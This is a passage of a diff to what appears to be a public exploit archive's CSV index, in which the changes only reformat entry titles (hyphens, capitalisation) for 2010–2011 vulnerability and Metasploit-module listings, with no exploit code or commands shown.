14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 -14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 +14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0 14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 @@ -12810,8 +12810,8 @@ id,file,description,date,author,platform,type,port 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - (.pls) Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0 14666,platforms/windows/dos/14666.txt,"Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14667,platforms/windows/dos/14667.txt,"Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 -14668,platforms/windows/dos/14668.txt,"Microsoft Windows win32k!xxxRealDrawMenuItem() - Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0 -14669,platforms/windows/dos/14669.txt,"Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos,0 +14668,platforms/windows/dos/14668.txt,"Microsoft Windows Win32k!xxxRealDrawMenuItem() - Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0 +14669,platforms/windows/dos/14669.txt,"Microsoft Windows Win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos,0 14670,platforms/windows/dos/14670.txt,"Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14671,platforms/windows/dos/14671.py,"Brazip 9.0 - (.zip) Buffer Overflow Vulnerability (SEH)",2010-08-17,ITSecTeam,windows,dos,0 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0 @@ -12827,8 +12827,8 @@ id,file,description,date,author,platform,type,port 14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,"mc2_s3lector ",php,webapps,0 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14688,platforms/freebsd/local/14688.c,"FreeBSD mbufs() sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,freebsd,local,0 -14689,platforms/windows/dos/14689.pl,"Tuniac 100723 Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 -14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 +14689,platforms/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 +14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 14691,platforms/lin_x86/shellcode/14691.c,"Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes",2010-08-19,Aodrulez,lin_x86,shellcode,0 14693,platforms/windows/local/14693.py,"Microsoft Word Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 14694,platforms/php/webapps/14694.txt,"Joomla Component com_extcalendar Blind SQL Injection Vulnerability",2010-08-20,Lagripe-Dz,php,webapps,0 @@ -12923,7 +12923,7 @@ id,file,description,date,author,platform,type,port 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 -14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 +14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injection Vulnerabilities",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection Vulnerability",2010-08-27,Pouya_Server,asp,webapps,0 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion Vulnerabilities",2010-08-28,LoSt.HaCkEr,php,webapps,0 @@ -13193,7 +13193,7 @@ id,file,description,date,author,platform,type,port 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability",2010-10-06,"Knud and nSense",osx,dos,0 15213,platforms/asp/remote/15213.pl,"ASP.NET Padding Oracle Vulnerability (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15214,platforms/win32/dos/15214.py,"HP Data Protector Media Operations NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win32,dos,19813 -15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion (+0day remote ftpd-anon)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 +15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion (+0day Remote ftpd-anon)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Remote File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection Vulnerability",2010-10-07,KnocKout,asp,webapps,0 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection Exploit",2010-10-08,ZoRLu,asp,webapps,0 @@ -13225,10 +13225,10 @@ id,file,description,date,author,platform,type,port 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service Vulnerability",2010-10-14,Sweet,windows,dos,0 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection Vulnerability",2010-10-14,Sky4,php,webapps,0 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload Vulnerability",2010-10-15,saudi0hacker,php,webapps,0 -15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 -15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 +15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 +15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 15259,platforms/windows/dos/15259.txt,"DATAC RealWin <= 2.0 (Build 6.1.8.10) Buffer Overflow Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 -15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 +15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 - Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB <= 6.5.0.3 - Denial of Service Vulnerability",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0 @@ -13326,7 +13326,7 @@ id,file,description,date,author,platform,type,port 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit (0day)",2010-11-01,"Nikita Tarakanov",windows,local,0 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 -15380,platforms/hardware/dos/15380.txt,"Xerox 4595 Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 +15380,platforms/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection Vulnerability",2010-11-01,"Anatolia Security",php,webapps,0 15382,platforms/asp/webapps/15382.txt,"douran portal <= 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 15383,platforms/windows/dos/15383.c,"Rising RSNTGDI.sys Local Denial of Service Vulnerability",2010-11-02,ze0r,windows,dos,0 @@ -13602,7 +13602,7 @@ id,file,description,date,author,platform,type,port 15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 -15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 +15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 - Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Internet Explorer 8 CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 - CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0 @@ -13689,7 +13689,7 @@ id,file,description,date,author,platform,type,port 15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 15804,platforms/php/webapps/15804.txt,"jobappr <= 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 -15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway Command Injection Vulnerability",2010-12-22,"George D. Gal",linux,remote,0 +15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection Vulnerability",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit (0day)",2010-12-22,WooYun,windows,remote,0 @@ -13728,7 +13728,7 @@ id,file,description,date,author,platform,type,port 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS <= 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 -15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 Denial of Service Vulnerability",2010-12-29,BraniX,windows,dos,0 +15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service Vulnerability",2010-12-29,BraniX,windows,dos,0 15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 (user.php) SQL Injection Vulnerability",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection Vulnerability",2010-12-29,kalashnikov,php,webapps,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 @@ -13768,14 +13768,14 @@ id,file,description,date,author,platform,type,port 15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34 - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 -15919,platforms/windows/local/15919.pl,"Enzip 3.00 Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0 +15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0 15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Multiple Vulnerabilities (xss, csrf)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - Multiple Vulnerabilities (SQLi, Auth Bypass, Path Disclosure)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion Vulnerbility",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 -15934,platforms/windows/local/15934.py,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 +15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent Remote Buffer Overflow",2011-01-08,ikki,multiple,remote,0 @@ -13825,7 +13825,7 @@ id,file,description,date,author,platform,type,port 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0 -16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 Buffer Overflow",2011-01-16,blake,windows,dos,0 +16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 @@ -13852,7 +13852,7 @@ id,file,description,date,author,platform,type,port 16035,platforms/windows/dos/16035.py,"Inetserv 3.23 SMTP Denial of Service Vulnerability",2011-01-23,G13,windows,dos,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - CSRF Vulnerability (Add Admin)",2011-01-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 Denial of Service",2011-01-24,dmnt,windows,dos,0 +16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,windows,dos,0 16039,platforms/php/webapps/16039.txt,"Joomla B2 Portfolio Component 1.0.0 - Multiple SQL Injection",2011-01-24,"Salvatore Fresta",php,webapps,0 16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall Root Exploit",2011-01-25,kingcope,multiple,remote,0 @@ -14105,7 +14105,7 @@ id,file,description,date,author,platform,type,port 16335,platforms/windows/remote/16335.rb,"WinComLPD <= 3.0.2 - Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16339,platforms/windows/remote/16339.rb,"Timbuktu Pro Directory Traversal/File Upload",2010-11-24,metasploit,windows,remote,0 16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,metasploit,windows,remote,0 @@ -14179,7 +14179,7 @@ id,file,description,date,author,platform,type,port 16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-11-03,metasploit,windows,remote,0 16410,platforms/windows/remote/16410.rb,"Computer Associates Alert Notification Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-11-03,metasploit,windows,remote,0 -16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow",2010-10-05,metasploit,windows,remote,0 +16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow",2010-10-05,metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe Media Service Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",2010-11-03,metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,metasploit,windows,remote,0 @@ -14190,7 +14190,7 @@ id,file,description,date,author,platform,type,port 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0 +16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,metasploit,windows,remote,0 -16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 Buffer Overflow",2010-08-25,metasploit,windows,remote,0 +16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow",2010-08-25,metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database isc_attach_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow SAMI Buffer Overflow",2010-10-05,metasploit,windows,remote,0 @@ -14227,13 +14227,13 @@ id,file,description,date,author,platform,type,port 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 -16466,platforms/win32/remote/16466.rb,"Arkeia Backup Client Type 77 Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 +16466,platforms/win32/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0 @@ -14387,7 +14387,7 @@ id,file,description,date,author,platform,type,port 16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 +16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0 16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-09-25,metasploit,windows,local,0 @@ -14395,7 +14395,7 @@ id,file,description,date,author,platform,type,port 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record Vulnerability",2010-09-25,metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 Buffer Overflow",2010-11-11,metasploit,windows,local,0 +16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,metasploit,windows,local,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 @@ -14481,10 +14481,10 @@ id,file,description,date,author,platform,type,port 16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 Format String",2010-06-22,metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g MKD Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0 -16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (win32)",2010-10-05,metasploit,windows,remote,2100 +16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"Serv-U FTPD MDTM Overflow",2010-09-20,metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 -16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 XMD5 Overflow",2010-04-30,metasploit,windows,remote,0 +16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,metasploit,windows,remote,0 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16719,platforms/windows/remote/16719.rb,"WS-FTP Server 5.03 MKD Overflow",2010-10-05,metasploit,windows,remote,21 16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer 